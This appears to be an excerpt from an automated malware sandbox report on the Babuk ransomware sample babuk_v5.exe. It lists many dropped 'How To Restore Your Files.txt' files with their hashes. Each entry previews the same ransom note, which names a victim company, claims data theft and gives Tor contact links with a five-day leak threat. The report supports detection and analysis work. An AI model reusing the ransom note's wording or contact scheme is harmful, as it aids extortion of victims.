                                                                            Preview: .I.{h..r<.W.....lN.,.6.C2...;....u....C....6t....9U.f....y..\h.'.........X=$.....df.....<.{.Q.3...m..H....S.1N+...(3^.....}........O-7f...9.....5!...).,.].m...P.m..Q.jS...}....:E........tD..k.n...T9..."q..'....Q......U.m.Pmz.7.r..&]&.}.`-.8.c........&b.j&..]Ys q_Rgx.....u.....k..7....E3...m.e.d."..L.&$t...r.v.|...b.T........L..9~.uN..T.J..yr......z.....YC...h.....P.Fi.".....0.\ua.!.n.......z...B...C....@/..H..b.\...,M.D..+.....j.....<5[...K..1..-j....fjv...e3...1W...,P..... D.L.....Mh.Ur....&j.........Q...L.....w.....~...6..j.o.]..<..s.2.{....t.*.,.M.X.y.c........fU.-;<IAL...c..... ..F!j..^Z.[..u...2.aJ...6...,.-t..f?rt@.h.j'.\@.......IL.......fF-..&.*7....n....R.h"j.......@.......A./,T.f..0h.J.-.. ..O...y3..?.W..3?...`...Bjx..g..@..s...2....7.V\R.%..tW..n!-q9g.dt"h....l..S ..[...."3....r.q|U....3q.[.?D...h .J%...V..r.8......W.)..].r.-.G....Q.K..y...........X..+....lH`..7*.L.`...>..P..g7...........k.....S.Py...]S.....l.N....NT<.3Es...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
